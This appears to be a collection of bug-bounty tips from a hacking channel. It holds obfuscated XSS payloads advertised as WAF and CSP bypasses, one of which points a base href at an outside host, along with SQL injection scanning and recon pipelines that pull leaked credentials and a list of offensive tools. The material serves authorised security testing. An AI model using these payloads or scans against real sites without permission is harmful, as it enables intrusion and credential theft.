💻ӉѦСҠіИԌ ҬЄѦӍ -Difusion

This tool is one of the best I've ever tried, it immediately returns sql vulnerabilities even the database, it's important to write the url with / at the end without this doesn't scan. SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings. github.com/malvads/sqlmc

XSS payload  <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> WAF / Cloudflare Bypass #bugbountytips #bugbounty

Top XSS Vectors Main+ Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm?.(1)//\ #bugbountytips #bugbounty

This checklist may help you to have a good methodology for bug bounty hunting https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md #bugbounty

JS Recon for IP, Hostname, URL from Waybackurls+LazyEgg waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u #bugbountytips #bugbounty

JS Recon - LazyEgg Extracting Endpoints from Dynamic App cat jsurls[.]txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips --leaked_creds --local_storage' #bugbountytips #bugbounty

Complete Bug Bounty Tool List Dnscan github.com/rbsec/dnscan Knockpy github.com/guelfoweb/knock Sublist3r https://github.com/aboul3la/Sublist3r Massdns https://github.com/blechschmidt/massdns NMAP nmap.org Masscan https://github.com/robertdavidgraham/masscan EyeWitness https://github.com/FortyNorthSecurity/EyeWitness DirBuster https://sourceforge.net/projects/dirbuster/ Dirsearch https://github.com/maurosoria/dirsearch Gitrob https://github.com/michenriksen/gitrob Git-secrets https://github.com/awslabs/git-secrets Sandcastle https://github.com/EWSoftware/SHFB https://github.com/0xSearches/sandcastle Bucket_finder https://digi.ninja/projects/bucket_finder.php GoogD0rker https://github.com/ZephrFish/GoogD0rker Wayback Machine web.archive.org waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per github.com/1N3/Sn1per/ XRay github.com/evilsocket/xray Wfuzz github.com/xmendez/wfuzz/ Patator https://github.com/lanjelot/patator Datasploit https://github.com/DataSploit/datasploit Hydra https://github.com/vanhauser-thc/thc-hydra Changeme https://github.com/ztgrace/changeme MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF Apktool https://github.com/iBotPeaches/Apktool Dex2jar https://sourceforge.net/projects/dex2jar/ SQLmap sqlmap.org Oxml_xxe https://github.com/BuffaloWill/oxml_xxe XXE Injector https://github.com/enjoiz/XXEinjector The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool Ground-control https://github.com/jobertabma/ground-control ssrfDetector https://github.com/JacobReynolds/ssrfDetector LFISuit https://github.com/D35m0nd142/LFISuite GitTools https://github.com/internetwache/GitTools dvcs-ripper https://github.com/kost/dvcs-ripper tko-subs https://github.com/anshumanbh/tko-subs HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer Race the Web https://github.com/TheHackerDev/race-the-web ysoserial https://github.com/GoSecure/ysoserial PHPGGC https://github.com/ambionics/phpggc CORStest https://github.com/RUB-NDS/CORStest Retire-js https://github.com/RetireJS/retire.js getsploit https://github.com/vulnersCom/getsploit Findsploit github.com/1N3/Findsploit bfac github.com/mazen160/bfac WPScan wpscan.org CMSMap github.com/Dionach/CMSmap Amass github.com/OWASP/Amass Extra Tools projectdiscovery.io Enjoy :) #HackersFactory #bugbounty Also do not forget to subscribe @cyberdilara

Easy P2,p3 bug  methodology  to find sqli, xss and injection attacks 1. waybackurls target.com | grep = | tee param.txt git clone = https://github.com/projectdiscovery/fuzzing-templates 2. cat param.txt | nuclei -t fuzzing-templates #bugbountytips #bugbounty

JS Recon - Bypass Server Security Tips: include valid header, without valid user agent, will get null 🥚 python lazyegg[.]py target/opensec[.]js -H 'user-agent: egg yolk omelet Chrome/999' --js_urls --domains --leaked_creds --oxregex #bugbountytips #bugbounty